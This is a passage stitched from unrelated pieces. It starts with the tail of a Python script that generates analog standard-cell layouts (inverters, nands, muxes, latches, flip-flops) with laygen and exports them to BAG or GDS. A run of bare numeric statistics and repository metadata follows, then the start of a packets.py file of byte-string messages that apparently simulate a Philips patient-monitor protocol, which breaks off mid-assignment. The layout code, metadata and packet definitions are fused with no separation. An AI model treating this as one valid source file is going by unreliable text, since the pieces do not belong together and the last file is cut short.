routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_dmy='pmos4_fast_dmy_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_match_4x') laygen.sel_cell('nand_match_4x') generate_nand_match(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_dmy='pmos4_fast_dmy_nf2', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_match_8x') laygen.sel_cell('nand_match_8x') generate_nand_match(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_dmy='pmos4_fast_dmy_nf2', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_match_16x') laygen.sel_cell('nand_match_16x') generate_nand_match(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_dmy='pmos4_fast_dmy_nf2', m=16, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tinv_1x') laygen.sel_cell('tinv_1x') generate_tinv_1x(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_2stack='nmos4_fast_center_2stack', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_2stack='pmos4_fast_center_2stack', devname_pmos_space='pmos4_fast_space', pin_i_abut='pmos', create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tinv_small_1x') laygen.sel_cell('tinv_small_1x') generate_tinv_small_1x(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_2stack='nmos4_fast_center_2stack', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_2stack='pmos4_fast_center_2stack', devname_pmos_space='pmos4_fast_space', pin_i_abut='pmos', create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tinv_2x') laygen.sel_cell('tinv_2x') generate_tinv(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tinv_4x') laygen.sel_cell('tinv_4x') generate_tinv(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tinv_8x') laygen.sel_cell('tinv_8x') generate_tinv(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('mux2to1_1x') laygen.sel_cell('mux2to1_1x') generate_mux2to1_1x(laygen, objectname_pfix='MUX2TO10', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_2stack='nmos4_fast_center_2stack', #devname_nmos_body_left='nmos4_fast_center_nf1_left', #devname_nmos_body_right='nmos4_fast_center_nf1_right', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_2stack='pmos4_fast_center_2stack', #devname_pmos_body_left='pmos4_fast_center_nf1_left', #devname_pmos_body_right='pmos4_fast_center_nf1_right', create_pin=True) laygen.add_template_from_cell() laygen.add_cell('mux2to1_2x') laygen.sel_cell('mux2to1_2x') generate_mux2to1(laygen, objectname_pfix='MUX2TO10', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('mux2to1_4x') laygen.sel_cell('mux2to1_4x') generate_mux2to1(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=4, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('mux2to1_8x') laygen.sel_cell('mux2to1_8x') generate_mux2to1(laygen, objectname_pfix='TINV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=8, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_1x') laygen.sel_cell('latch_2ck_1x') laygen.templates.sel_library(workinglib) generate_latch_2ck(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=1, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_2x') laygen.sel_cell('latch_2ck_2x') laygen.templates.sel_library(workinglib) generate_latch_2ck(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=2, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_4x') laygen.sel_cell('latch_2ck_4x') laygen.templates.sel_library(workinglib) generate_latch_2ck(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=4, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_8x') laygen.sel_cell('latch_2ck_8x') laygen.templates.sel_library(workinglib) generate_latch_2ck(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=8, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_rstbh_2x') laygen.sel_cell('latch_2ck_rstbh_2x') laygen.templates.sel_library(workinglib) generate_latch_2ck_rstbh(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=2, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('latch_2ck_rstbh_4x') laygen.sel_cell('latch_2ck_rstbh_4x') laygen.templates.sel_library(workinglib) generate_latch_2ck_rstbh(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=4, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_1x') laygen.sel_cell('dff_1x') laygen.templates.sel_library(workinglib) generate_dff(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=1, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_2x') laygen.sel_cell('dff_2x') laygen.templates.sel_library(workinglib) generate_dff(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=2, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_4x') laygen.sel_cell('dff_4x') laygen.templates.sel_library(workinglib) generate_dff(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=4, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_rsth_1x') laygen.sel_cell('dff_rsth_1x') laygen.templates.sel_library(workinglib) generate_dff_rsth(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=1, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_rsth_2x') laygen.sel_cell('dff_rsth_2x') laygen.templates.sel_library(workinglib) generate_dff_rsth(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=2, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('dff_rsth_4x') laygen.sel_cell('dff_rsth_4x') laygen.templates.sel_library(workinglib) generate_dff_rsth(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=4, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('oai22_1x') laygen.sel_cell('oai22_1x') generate_oai22_1x(laygen, objectname_pfix='OAI0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_left='nmos4_fast_center_nf1_left', devname_nmos_body_right='nmos4_fast_center_nf1_right', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_2stack='pmos4_fast_center_2stack', origin=np.array([0, 0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('oai22_skewed_1x') laygen.sel_cell('oai22_skewed_1x') generate_oai22_skewed_1x(laygen, objectname_pfix='OAI0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_left='nmos4_fast_center_nf1_left', devname_nmos_body_right='nmos4_fast_center_nf1_right', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_2stack='pmos4_fast_center_2stack', origin=np.array([0, 0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('ndsr_1x') laygen.sel_cell('ndsr_1x') laygen.templates.sel_library(workinglib) generate_ndsr(laygen, objectname_pfix='NDSR0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=1, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.add_cell('ndsr_2x') laygen.sel_cell('ndsr_2x') laygen.templates.sel_library(workinglib) generate_ndsr(laygen, objectname_pfix='NDSR0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=2, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() laygen.save_template(filename=workinglib+'.yaml', libname=workinglib) #bag export, if bag does not exist, gds export mycell_list=['space_1x', 'space_2x', 'space_4x', 'space_wovdd_1x', 'space_wovdd_2x', 'space_wovdd_4x', 'tap', 'tap_wovdd', 'tap_float', 'tap_float_pmos_vss', 'tap_pmos_vss', 'tie_2x', 'tie_wovdd_2x', 'bcap_4x', 'bcap_8x', 'dcap_2x', 'dcap_4x', 'dcap_8x', 'dcap2_4x', 'dcap2_8x', 'dcap3_8x', 'bcap2_8x', 'inv_1x', 'inv_2x', 'inv_4x', 'inv_6x', 'inv_8x', 'inv_10x', 'inv_16x', 'inv_24x', 'inv_32x', 'tgate_2x', 'tgate_4x', 'tgate_8x', 'nsw_2x', 'nsw_4x', 'nsw_8x', 'nsw_12x', 'nsw_16x', 'nsw_wovdd_2x', 'nsw_wovdd_4x', 'nsw_wovdd_8x', 'nsw_wovdd_12x', 'nsw_wovdd_16x', 'tinv_1x', 'tinv_small_1x', 'tinv_2x', 'tinv_4x', 'tinv_8x', 'nand_1x', 'nand_2x', 'nand_4x', 'nand_8x', 'nand_16x', 'nand_match_2x', 'nand_match_4x', 'nand_match_8x', 'nand_match_16x', 'nor_2x', 'nor_4x', 'nor_8x', 'latch_2ck_1x', 'latch_2ck_2x', 'latch_2ck_4x', 'latch_2ck_8x', 'latch_2ck_rstbh_2x', 'latch_2ck_rstbh_4x', 'dff_1x', 'dff_2x', 'dff_4x', 'dff_rsth_1x', 'dff_rsth_2x', 'dff_rsth_4x', 'oai22_1x', 'oai22_skewed_1x', 'ndsr_1x', 'ndsr_2x', 'mux2to1_1x', 'mux2to1_2x', 'mux2to1_4x', 'mux2to1_8x', ] #Zhongkai's cells tgate_dn_size = [2, 4, 8, 16, 18, 24] pull_dn_size = 4 for m in tgate_dn_size: laygen.add_cell('tgate_dn_'+str(m)+'x') laygen.sel_cell('tgate_dn_'+str(m)+'x') generate_tgate_dn(laygen, objectname_pfix='TG0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=m, n= pull_dn_size, create_pin=True ) laygen.add_template_from_cell() mycell_list.append('tgate_dn_'+str(m)+'x') #cap_sw cap_sw_size = [2, 4, 8, 16, 32] for m in cap_sw_size: laygen.add_cell('cap_sw_'+str(m)+'x') laygen.sel_cell('cap_sw_'+str(m)+'x') generate_cap_sw(laygen, objectname_pfix='CSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=m, create_pin=True ) laygen.add_template_from_cell() mycell_list.append('cap_sw_'+str(m)+'x') inv_size = [6, 8, 36, 40, 50, 64, 100] for m in inv_size: laygen.add_cell('inv_'+str(m)+'x') laygen.sel_cell('inv_'+str(m)+'x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=m, create_pin=True ) laygen.add_template_from_cell() mycell_list.append('inv_'+str(m)+'x') #latch latch_2ck_strstbh_size = [1, 2, 4, 8] for m in latch_2ck_strstbh_size: laygen.add_cell('latch_2ck_strstbh_'+str(m)+'x') laygen.sel_cell('latch_2ck_strstbh_'+str(m)+'x') laygen.templates.sel_library(workinglib) generate_latch_2ck_strstbh(laygen, objectname_pfix='LATCH0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=m, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() mycell_list.append('latch_2ck_strstbh_'+str(m)+'x') #dff dff_strsth_size = [1, 2, 4, 8] for m in dff_strsth_size: laygen.add_cell('dff_strsth_'+str(m)+'x') laygen.sel_cell('dff_strsth_'+str(m)+'x') laygen.templates.sel_library(workinglib) generate_dff_strsth(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=m, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() mycell_list.append('dff_strsth_'+str(m)+'x') #dff_clkb dff_strsth_clkb_size = [1, 2, 4, 8] for m in dff_strsth_clkb_size: laygen.add_cell('dff_strsth_ckb_'+str(m)+'x') laygen.sel_cell('dff_strsth_ckb_'+str(m)+'x') laygen.templates.sel_library(workinglib) generate_dff_strsth_ckb(laygen, objectname_pfix='DFF0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m3m4=rg_m3m4, origin=np.array([0, 0]), m=m, create_pin=True) laygen.templates.sel_library(utemplib) laygen.add_template_from_cell() mycell_list.append('dff_strsth_ckb_'+str(m)+'x') #end Zhongkai's cells laygen.save_template(filename=workinglib+'.yaml', libname=workinglib) import imp try: imp.find_module('bag') import bag prj = bag.BagProject() for mycell in mycell_list: laygen.sel_cell(mycell) laygen.export_BAG(prj, array_delimiter=['[', ']']) except ImportError: laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+".layermap") # change layermapfile
71.825161
208
0.64874
52,433
367,673
4.345927
0.012053
0.066599
0.032861
0.027213
0.974112
0.966485
0.957704
0.951459
0.944047
0.935871
0
0.067221
0.191115
367,673
5,118
209
71.839195
0.698973
0.043677
0
0.770167
0
0
0.052658
0.00715
0
0
0
0
0
1
0.011456
false
0
0.002148
0
0.013604
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
2936067d2b4ccaf0ffe52fd08e0904f29ee4f348
210,420
py
Python
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
3
2019-11-15T03:41:16.000Z
2021-10-12T06:24:17.000Z
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
null
null
null
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
2
2019-11-15T03:41:20.000Z
2019-11-15T03:46:19.000Z
# data or wave association request association_request = \ b"\x0d\xff\x01\x28\x05\x08" \ b"\x13\x01\x00\x16\x01\x02\x80\x00\x14\x02\x00\x02\xc1\xff\x01\x16" \ b"\x31\x80\xa0\x80\x80\x01\x01\x00\x00\xa2\x80\xa0\x03\x00\x00\x01" \ b"\xa4\x80\x30\x80\x02\x01\x01\x06\x04\x52\x01\x00\x01\x30\x80\x06" \ b"\x02\x51\x01\x00\x00\x00\x00\x30\x80\x02\x01\x02\x06\x0c\x2a\x86" \ b"\x48\xce\x14\x02\x01\x00\x00\x00\x01\x01\x30\x80\x06\x0c\x2a\x86" \ b"\x48\xce\x14\x02\x01\x00\x00\x00\x02\x01\x00\x00\x00\x00\x00\x00" \ b"\x61\x80\x30\x80\x02\x01\x01\xa0\x80\x60\x80\xa1\x80\x06\x0c\x2a" \ b"\x86\x48\xce\x14\x02\x01\x00\x00\x00\x03\x01\x00\x00\xbe\x80\x28" \ b"\x80\x06\x0c\x2a\x86\x48\xce\x14\x02\x01\x00\x00\x00\x01\x01\x02" \ b"\x01\x02\x81\x82\x00\x80\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00" \ b"\x00\x00\x80\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x02" \ b"\x00\x64\x00\x01\x00\x28\x80\x00\x00\x00\x00\x00\x0f\xa0\x00\x00" \ b"\x05\xb0\x00\x00\x05\xb0\xff\xff\xff\xff\x60\x00\x00\x00\x00\x01" \ b"\x00\x0c\xf0\x01\x00\x08\x8e\x00\x00\x00\x00\x00\x00\x00\x01\x02" \ b"\x00\x34\x00\x06\x00\x30\x00\x01\x00\x21\x00\x00\x00\x01\x00\x01" \ b"\x00\x06\x00\x00\x00\xc9\x00\x01\x00\x09\x00\x00\x00\x3c\x00\x01" \ b"\x00\x05\x00\x00\x00\x10\x00\x01\x00\x2a\x00\x00\x00\x01\x00\x01" \ b"\x00\x36\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00" print(type(association_request)) association_request_ba = bytearray(association_request) association_response = \ b"\x0e\xce\x05\x08\x13\x01" \ b"\x00\x16\x01\x02\x80\x00\x14\x02\x00\x02\xc1\xbe\x31\x80\xa0\x80" \ b"\x80\x01\x01\x00\x00\xa2\x80\xa0\x03\x00\x00\x01\xa5\x80\x30\x80" \ b"\x80\x01\x00\x81\x02\x51\x01\x00\x00\x30\x80\x80\x01\x00\x81\x0c" \ b"\x2a\x86\x48\xce\x14\x02\x01\x00\x00\x00\x02\x01\x00\x00\x00\x00" \ b"\x61\x80\x30\x80\x02\x01\x01\xa0\x80\x61\x80\xa1\x80\x06\x0c\x2a" \ b"\x86\x48\xce\x14\x02\x01\x00\x00\x00\x03\x01\x00\x00\xa2\x03\x02" \ b"\x01\x00\xa3\x05\xa1\x03\x02\x01\x00\xbe\x80\x28\x80\x02\x01\x02" \ b"\x81\x48\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x80" \ b"\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x2c\x00\x01" \ b"\x00\x28\x80\x00\x00\x00\x00\x00\x0f\xa0\x00\x00\x05\xb0\x00\x00" \ b"\x05\xb0\xff\xff\xff\xff\x60\x00\x00\x00\x00\x01\x00\x0c\xf0\x01" \ b"\x00\x08\x8e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" mds_create_event_report = \ b"\xe1\x00\x00\x02\x00\x01" \ b"\x01\x1a\x00\x01\x00\x01\x01\x14\x00\x21\x00\x00\x00\x00\x0e\x7f" \ b"\x92\x00\x0d\x06\x01\x06\x00\x21\x00\x00\x00\x00\x00\x11\x00\xfc" \ b"\x09\x84\x00\x08\x00\x06\x00\x09\xfb\x9c\xa9\x3c\x09\x86\x00\x04" \ b"\x00\x01\x11\x4d\x09\x1d\x00\x02\x00\x4d\x09\x28\x00\x12\x00\x08" \ b"\x50\x68\x69\x6c\x69\x70\x73\x00\x00\x06\x4d\x38\x30\x30\x30\x00" \ b"\x09\x48\x00\x04\x00\x01\x00\x00\x09\x37\x00\x08\x06\x55\x06\x55" \ b"\x00\x0d\x00\x0b\x09\x46\x00\x02\x20\x00\x09\x0d\x00\x02\x00\x02" \ b"\x09\x35\x00\x02\x00\x01\x09\x82\x00\x02\x00\x00\x09\x0c\x00\x02" \ b"\x00\x00\xf1\xfa\x00\x14\x00\x01\x00\x10\x00\x01\x00\x0c\x00\x06" \ b"\x00\x00\x87\x92\x00\x06\x00\x00\x88\x16\x09\xa7\x00\x02\x00\x06" \ b"\x09\x1e\x00\x24\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x87\x00\x08\x20\x19\x03\x21" \ b"\x17\x42\x28\x00\x09\x8f\x00\x04\x0e\x7f\x92\x00\x09\x85\x00\x3c" \ b"\x00\x01\x00\x38\x01\x02\x00\x34\x00\x06\x00\x30\x00\x01\x00\x21" \ b"\x00\x00\x00\x01\x00\x01\x00\x06\x00\x00\x01\x19\x00\x01\x00\x09" \ b"\x00\x00\x00\x4c\x00\x01\x00\x2a\x00\x00\x00\x01\x00\x01\x00\x36" \ b"\x00\x00\x00\x01\x00\x01\x00\x05\x00\x00\x00\x3d" mds_create_event_result = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x14\x00\x01\x00\x01\x00\x0e\x00\x21\x00\x00\x00\x00\x00\x0a" \ b"\xbd\x00\x0d\x06\x00\x00" rtsa_priority_list_request = \ b"\xe1\x00\x00\x02\x00\x01" \ b"\x00\x16\x00\x00\x00\x03\x00\x10\x00\x21\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x01\x00\x02\xf2\x3a" set_rtsa_priority_list_request = \ b"\xe1\x00\x00\x02\x00\x01" \ b"\x00\x2e\x00\x00\x00\x05\x00\x28\x00\x21\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x01\x00\x1a\x00\x00\xf2\x3a\x00\x14\x00\x04\x00\x10" \ b"\x00\x02\x01\x02\x00\x02\x01\x01\x00\x02\x01\x3d\x00\x02\x4b\xb4" data_poll_request = \ b"\xe1\x00\x00\x02\x00\x01\x00\x20\x00\x01\x00\x07\x00\x1a\x00\x21" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x3b\x00\x0c\x00\x01\x00\x01" \ b"\x00\x06\x00\x00\x00\x00\x00\x00" ext_poll_wave_request = \ b"\xe1\x00\x00\x02\x00\x01\x00\x28\x00\x04\x00\x07\x00\x22\x00\x21" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x3b\x00\x14\x00\x03\x00\x01" \ b"\x00\x09\x00\x00\x00\x01\x00\x08\xf1\x3e\x00\x04\x00\x49\x3e\x00" rsp_get_result = \ b"\xe1\x00\x00\x02\x00\x02\x00\x18\x00\x00\x00\x03\x00\x12\x00\x21" \ b"\x00\x00\x00\x00\x00\x01\x00\x08\xf2\x3a\x00\x04\x00\x00\x00\x00" rsp_confirmed_set_result = \ b"\xe1\x00\x00\x02\x00\x02\x00\x28\x00\x00\x00\x05\x00\x22\x00\x21" \ b"\x00\x00\x00\x00\x00\x01\x00\x18\xf2\x3a\x00\x14\x00\x04\x00\x10" \ b"\x00\x02\x01\x02\x00\x02\x01\x01\x00\x02\x01\x3d\x00\x02\x4b\xb4" # first group of responses rsp_nu_1_no_1 = \ 